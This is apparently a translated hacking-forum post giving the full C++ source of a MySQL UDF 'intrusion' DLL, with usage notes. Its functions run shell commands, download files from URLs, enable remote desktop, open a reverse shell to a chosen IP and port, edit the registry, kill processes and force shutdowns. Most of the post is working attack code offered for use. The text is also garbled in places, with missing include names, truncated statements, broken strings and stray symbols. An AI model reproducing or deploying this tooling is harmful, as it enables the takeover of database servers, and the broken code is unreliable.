extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
//The function that truly implements the function is required;
/*
Function content;
return Result;
*/
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
//Calculating after the open3389 function, it is generally used for memory release, optional functions;
}
The return value of the above open3389 function is of type char *. If it is a function of other types, the parameter list will be different. For details, you can see the MYSQL reference manual.
Another issue that must be considered when writing MYSQL UDF is that when the program is stable, it must withstand the test of various abnormal inputs, otherwise the MYSQL service process will be disconnected once the program errors.
Here is the UDF content I wrote, which contains 10 functions:
cmdshell Execute cmd;
downloader: downloader, download the specified file online and save it to the specified directory;
open3389 universal 3389 terminal service, which can specify ports (no need to restart if the port is not changed);
backshell bounces Shell;
ProcessView enumerates system processes;
KillProcess terminates the specified process;
regress Read Read the registry;
regwrite write the registry;
shut Shut down, log out, restart;
about Instructions and helper functions;
How to use:
Create function: create function function function function (case sensitive) returns string soname 'dll name' (note the path);
Delete function: delete function function name;
Use function: select function name (parameter list); you can use select function name ("help");
The above functions have been tested multiple times (testing platform: MYSQL 5.0.24-community-nt, Windows XP), which is unlikely to cause MYSQL to be faked, but it is not ruled out that errors occur in special environments and special inputs. If you find a bug, please notify me. QQ: 185826531 (langouster)
Program code
//-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// MYSQL_UDF.cpp : Define the entry point of the DLL application.
#include ""
#include ""
#include <>
#include <>
#include <>
#include <>
#include <>
#include ""
#include ""
#pragma comment(lib, "")
HANDLE g_module;
//--------------------------------------------------------------------------------------------------------------------------
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//--------------------------------------------------------------------------------------------------------------------------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Execute CMD Shell function.\r\nExample:select cmdshell(\"dir c:\\\\\");\r\n\n\"\\\" in the parameter should be replaced by \"\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
int RunStatus=0;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];
DWORD size=0,len;
HANDLE hFile;
GetSystemDirectory(ShellPath,MAX_PATH-1);
strcat(ShellPath,"\\");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);
strcat(TempFilePath,"\\");
cmdline=(char *)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[0]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
=SW_HIDE;
= sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);
free(cmdline);
if(!RunStatus)
{
itoa(GetLastError(),temp,10);
Sprintf(temp,"Shell cannot start, GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+1);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(,30000);
//Get the results
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+100);
ReadFile(hFile,initid->ptr,size+1,&len,NULL);
(initid->ptr)[size]='\0';
Strcat(initid->ptr,"\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"\r\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
}
(*length)=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Downloader function\r\nExample:select downloader(\"/\",\"c:\\\\\\\\\\\\ system32\\\\\");\r\n\"\\\\" in the parameter should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hFile;
char path[MAX_PATH];
strcpy(path,(args->args)[1]);
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100+strlen(path));
Sprintf(initid->ptr,"File creation failed, please confirm that the directory exists and has write permissions (%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
if(URLDownloadToFile(NULL,(args->args)[0],path,0,0)==S_OK)
{
initid->ptr=(char *)malloc(50+strlen(path));
Sprintf(initid->ptr,"The file download was successful (%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100+strlen((args->args)[0]));
Sprintf(initid->ptr,"An error occurred when downloading the file, which may be due to the network (%s).",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count==0 ||(args->arg_count==1 && args->arg_type[0]==INT_RESULT)))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Universal opening of 3389 terminal service. Modification of ports requires restart to take effect.\r\nExample: select open3389([port]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in finding the resource, open3389 cannot continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in loading the resource, open3389 cannot continue running.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred creating a temporary file, open3389 cannot continue running.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
=SW_HIDE;
= sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,0,0,0,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred running the temporary file, your permissions may not be enough.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WaitForSingleObject(,5000);
DeleteFile(path);
//Change the port
if(args->arg_count!=0 && args->arg_type[0]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
DWORD port=*((long long *) args->args[0]);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",0,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
sprintf(initid->ptr,"Successfully opened the 3389 terminal service....\r\nSuccessfully modified the terminal service port to %d, and it takes effect after restarting. You can use the WindowsExit function to restart the system.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
RegCloseKey(key);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Successfully opened 3389 terminal service...\r\nModify the terminal service port failed.");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Successfully opened 3389 terminal service.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=3 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(250);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Read registry function.\r\nExample:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\r\n\\"\\\\" in the parameter should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
DWORD a,b,c;
BYTE bytere[1000];
HKEY key,key2;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
key=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
key=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
key=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
key=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
Sprintf(initid->ptr,"Unknown registry handle:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(key,(args->args)[1],0,0,REG_OPTION_NON_VOLATILE,KEY_QUERY_VALUE,NULL,&key2,&b);
if(b==REG_OPENED_EXISTING_KEY)
{
if(!RegQueryValueEx(key2,(args->args)[2],0,&a,bytere,&c))
{
CloseHandle(key2);
initid->ptr=(char *)malloc(1001);
memset(initid->ptr,0,1001);
strcpy(initid->ptr,(char *)bytere);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"Cannot find the registry value\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
else
{
CloseHandle(key2);
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Cannot find registry key\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regwrite
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=5 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=STRING_RESULT || args->arg_type[2]!=STRING_RESULT || args->arg_type[3]!=STRING_RESULT || args->arg_type[4]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(300);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"write registry function.\r\nExample: select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\r\n\\"\\\\\" should be replaced by \"\\\\\\\");
*length=strlen(initid->ptr);
return initid->ptr;
}
HKEY key,hkey;
DWORD dwDisposition,ktype;
if(strcmp("HKEY_LOCAL_MACHINE",(args->args)[0])==0)
hkey=HKEY_LOCAL_MACHINE;
else if(strcmp("HKEY_CLASSES_ROOT",(args->args)[0])==0)
hkey=HKEY_CLASSES_ROOT ;
else if(strcmp("HKEY_CURRENT_USER ",(args->args)[0])==0)
hkey=HKEY_CURRENT_USER ;
else if(strcmp("HKEY_USERS ",(args->args)[0])==0)
hkey=HKEY_USERS ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[0]));
Sprintf(initid->ptr,"Unknown registry handle:%s\r\n",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(strcmp("REG_BINARY",(args->args)[3])==0)
ktype=REG_BINARY;
else if(strcmp("REG_DWORD",(args->args)[3])==0)
ktype=REG_DWORD ;
else if(strcmp("REG_DWORD_LITTLE_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_LITTLE_ENDIAN ;
else if(strcmp("REG_DWORD_BIG_ENDIAN",(args->args)[3])==0)
ktype=REG_DWORD_BIG_ENDIAN ;
else if(strcmp("REG_EXPAND_SZ",(args->args)[3])==0)
ktype=REG_EXPAND_SZ ;
else if(strcmp("REG_LINK",(args->args)[3])==0)
ktype=REG_LINK ;
else if(strcmp("REG_MULTI_SZ",(args->args)[3])==0)
ktype=REG_MULTI_SZ ;
else if(strcmp("REG_NONE",(args->args)[3])==0)
ktype=REG_NONE ;
else if(strcmp("REG_RESOURCE_LIST",(args->args)[3])==0)
ktype=REG_RESOURCE_LIST ;
else if(strcmp("REG_SZ",(args->args)[3])==0)
ktype=REG_SZ ;
else
{
initid->ptr=(char *)malloc(50+strlen((args->args)[3]));
Sprintf(initid->ptr,"Unknown registry value type: %s\r\n",(args->args)[3]);
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCreateKeyEx(hkey,(args->args)[1],0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,(args->args)[2],0,ktype,(BYTE *)(args->args)[4],lstrlen((args->args)[4])+1))
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Writing the registry successfully\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Writing the registry failed, it may be that your permissions are insufficient\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
RegCloseKey(key);
}
extern "C" __declspec(dllexport)void regwrite_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------KillProcess
extern "C" __declspec(dllexport)my_bool KillProcess_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *KillProcess(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || (strcmp((args->args)[0],"help")==0))
{
initid->ptr=(char *)malloc(200);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"End process function.\r\nExample:select KillProcess(\"Process name or process ID (decimal)\");\r\nThe program cannot end the system process at present.");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=0;
HANDLE hProcess;
char ProcessName[MAX_PATH],tempchar[10];
PROCESSENTRY32 pe;
strcpy(ProcessName,(args->args)[0]);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
= sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
itoa(pe.th32ProcessID,tempchar,10);
if(stricmp(,ProcessName)==0 || stricmp(tempchar,ProcessName)==0)
{
processid=pe.th32ProcessID;
break;
}
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
if(processid==0)
{
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"Process %s cannot be found, please confirm whether the process exists!",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
hProcess=OpenProcess(PROCESS_TERMINATE,false,processid);
if(TerminateProcess(hProcess,0))
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"%s process terminated successfully.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
CloseHandle(hProcess);
initid->ptr=(char *)malloc(100);
Sprintf(initid->ptr,"%s process termination failed, your permissions may be insufficient.",(args->args)[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void KillProcess_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------ProcessView
extern "C" __declspec(dllexport)my_bool ProcessView_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *ProcessView(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Enum process functions.\r\nExample:select ProcessView();");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hSnapshot = NULL;
DWORD processid=0;
PROCESSENTRY32 pe;
char tempchar[10];
initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,1000);
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
= sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
strcat(initid->ptr,);
strcat(initid->ptr,"\t");
itoa(pe.th32ProcessID,tempchar,10);
strcat(initid->ptr,tempchar);
strcat(initid->ptr,"\r\n");
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle(hSnapshot);
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void ProcessView_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------WindowsExit
extern "C" __declspec(dllexport)my_bool shut_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *shut(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Shutdown-restart logout function.\r\nExample:select shut(\"logoff|shutdown|reboot\");");
*length=strlen(initid->ptr);
return initid->ptr;
}
HANDLE hToken;
TOKEN_PRIVILEGES token;
UINT Flag;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"An error occurred to obtain process access signaling, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
= 1;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &[0].Luid);
[0].Attributes=SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken,0,&token, sizeof(token),0,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"An error occurred to obtain the shutdown token, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
if(stricmp(args->args[0],"logoff")==0)
Flag=EWX_LOGOFF|EWX_FORCE;
else if(stricmp(args->args[0],"shutdown")==0)
Flag=EWX_SHUTDOWN|EWX_FORCE;
else if(stricmp(args->args[0],"reboot")==0)
Flag=EWX_REBOOT|EWX_FORCE;
else
{
initid->ptr=(char *)malloc(100+strlen(args->args[0]));
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Unknown parameter %s, expected to be one of logoff, shutdown, and reboot.\r\n",args->args[0]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,0))
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Execute successfully.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Sprintf(initid->ptr,"Execution failed, your permissions may be insufficient.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void shut_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
extern "C" __declspec(dllexport)my_bool backshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *backshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!=2 || args->arg_type[0]!=STRING_RESULT || args->arg_type[1]!=INT_RESULT || stricmp(args->args[0],"help")==0)
{
initid->ptr=(char *)malloc(100);
if(initid->ptr==NULL)return NULL;
Strcpy(initid->ptr,"Bounce shell.\r\nExample:select backshell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[400];
DWORD size,size2;
GetEnvironmentVariable("temp",path,MAX_PATH-1);
strcat(path,"\\");
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in finding the resource, and the backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"There was an error in loading the resource, and the backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
hFile = CreateFile(path,GENERIC_WRITE,0, NULL,Create_ALWAYS,0,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"An error occurred creating a temporary file, backshell could not continue to run.");
*length=strlen(initid->ptr);
return initid->ptr;
}
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+1,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-1);
strcat(path,"\\");
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[0],*((long long *) args->args[1]));
if(WinExec(cmd,SW_HIDE)>31)
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Execution successful\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(100);
Strcpy(initid->ptr,"Execution failed\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
extern "C" __declspec(dllexport)void backshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{//return 1 error, 0 normal
initid->max_length=65*1024*1024;
return 0;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc(2000);
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,0,2000);
strcat(initid->ptr,"mysql intrusion dll version 1.0.0.1\r\n\r\n");
strcat(initid->ptr,"Note: To use this dll, you must have insert and delete permissions to mysql to create and delete functions.\r\n\r\n");
¥Strcat(initid->ptr,"Usage method:\r\n");
¥Strcat(initid->ptr,"Create function: create function function function (case sensitive) returns string soname \"dll name\" (note the path);\r\n");
¥Strcat(initid->ptr,"Delete function: delete function function function;\r\n");
¥Strcat(initid->ptr,"Use function:select function name (parameter list); use select function name (\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
¥Strcat(initid->ptr,"The function contained in this dll:\r\n");
¥Strcat(initid->ptr,"cmdshell execute cmd;\r\n");
¥Strcat(initid->ptr,"downloader Downloader, download the specified file online and save it to the specified directory;\r\n");
¥Strcat(initid->ptr,"open3389 Universal 3389 terminal service, can specify ports (no need to restart if the port is not changed);\r\n");
¥Strcat(initid->ptr,"backshell Backshell;\r\n");
¥Strcat(initid->ptr,"ProcessView enumer system processes;\r\n");
¥Strcat(initid->ptr,"KillProcess terminates the specified process;\r\n");
¥Strcat(initid->ptr,"regread read the registry;\r\n");
¥Strcat(initid->ptr,"regwrite write registry;\r\n");
¥Strcat(initid->ptr,"shut shut shut, log out, restart;\r\n");
¥Strcat(initid->ptr,"about This function;\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
¥Strcat(initid->ptr,"Each function in DLL has been tested multiple times, which is unlikely to cause MYSQL to be faked, but the possibility of errors in special environments and special inputs is not ruled out.\r\n");
Strcat(initid->ptr,"If you find bugs during use, please contact me QQ: 185826531(langouster)\r\n");
¥Strcat(initid->ptr,"The source program is public, and functions can be modified and added at will. Please indicate the original author of the source program.\r\n\r\n");
Strcat(initid->ptr,"Special statement: This program is for technical research only, and the author is not responsible for the consequences caused by improper use of the program!");
*length=strlen(initid->ptr);
return initid->ptr;
}
extern "C" __declspec(dllexport)void about_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}